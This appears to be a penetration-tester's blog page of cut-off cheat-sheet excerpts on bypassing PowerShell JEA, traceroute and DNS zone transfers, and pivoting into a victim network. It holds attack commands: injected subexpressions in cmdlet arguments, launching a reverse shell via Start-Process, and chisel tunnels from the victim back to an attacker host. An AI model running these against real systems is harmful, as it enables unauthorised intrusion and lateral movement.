Steinz Security

  Bypassing JEA #View all the commands that we have access to get-command * #View the source code of the Commands/cmdlets Get-Command -ShowCommandInfo -Name CmdLet_NAME Get-Command -ShowCommandInfo -Name Get-ChildItem #using SharpMapExec to bypass JEA or find interesting items |.\SharpMapExec.exe ntlm winrm /user:USERNAME/password:"p@ssw0RD!" /domain:steins.local /computername:10.10.10.10 Note : ExpandString & Invoke-Expression might be vulnerable to command execution #Examples of Bypasing JE A get-something -command 'Hello $([void] (Get-Item C:\))' get-something -command '$(""; ipconfig)' #If Full language mode is enabled function test() {whoami};test #Bypassing JEA if start-Process is accessible Enter-PSSession -ComputerName <Name> -ConfigurationName <Name> Start-Process cmd.exe revshell.exe Powershell Remote Access Enable-PSRemoting #uses TCP - Port 5985, 5986 for SSL. #Start a PS Session Enter-PSSession -ComputerName kurisu.st...

    Traceroute By default, tracroute sends UDP packets with incrementing dest ports starting at the bsae port of 33434, going up by one port for each packet sent (each hop measured 3 times) #traceroute to multiple hosts traceroute -g 10.10.10.1, 10.10.10.2 #Use ICMP instead of UDP traceroute -I 10.10.10.10 #Use TCP SYN instead of UDP traceroute -T 10.10.10.10 Online Traceroute Websites : 1) Traceroute.org 2) Kloth.net/services/traceroute.php 3) tracert.com nslookup check if there is anything in the - DNS Cache Snooping >nslookup set norecurse www.website.com set recurse wwww.website.com #Zone transfer > dig @10.10.10.10 target -t AXFR #Incremental Zone Transfer dig @10.10.10.10 -t IXFR=N Kill a running Process/Open Port netstat -pantp | grep LIST #View the process ID sudo lsof -t -i:80 #Kill the process sudo fuser -k 80/tcp  Find Largest Files in Linux du -a /var | sort -n -r | head -n 10 #Get Readable output du -hsx -- * | sort -rh | head -10 Installing Samba on...

    Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 or ./chisel server --port 9001 -reverse #On Victim ./chisel.exe client 10.10.10.1:9001 R:0.0.0.0:1080:socks .\chisel.exe client 10.10.10.1:9001 R:8080:127.0.0.1:8080 R:8888:127.0.0.1:8888 R:9090:127.0.0.1:9090 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #If the above doesnt work #asuming Kali and windows are on Eht0 #add a firewall rule to allow Kali ip traffic netsh advfirewall firewall add rule name="Allow VPN Traffic" dir=in action=allow protocol=any remoteip=KALI_ETH0_IP #on Kali - Allow tun0 traffic to forward on iptables sudo iptables -P FORWARD ACCEPT s...